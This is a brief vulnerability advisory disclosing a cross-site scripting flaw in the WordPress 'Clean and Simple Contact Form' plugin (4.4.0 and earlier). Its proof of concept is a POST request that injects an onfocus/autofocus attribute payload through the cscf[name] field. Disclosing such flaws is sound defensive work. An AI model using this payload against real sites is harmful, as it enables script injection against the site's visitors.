WordPress Clean and Simple contact Form plugin version 4.4.0 suffers from a cross site scripting vulnerability.
1d91c931536f21ad20aa07da813acd456f8bec8475ff5a7c8e9689ecb7f54ede
Author : Ajin Abraham
Author Website: http://opensecurity.in
Affected Product: WordPress Clean and Simple Contact Form
Affected Version: <= 4.4.0
Vendor: Meg Nicholas
Vendor URL:
http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/
WP Plugin URL:
https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/
PoC:
Make a POST request to the page containing the contact form generated by
"Clean and Simple Contact Form"
with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x="
POST http://localhost/contact-us/
cscf[name]=" onfocus=alert(1) autofocus x="
*Regards,Ajin*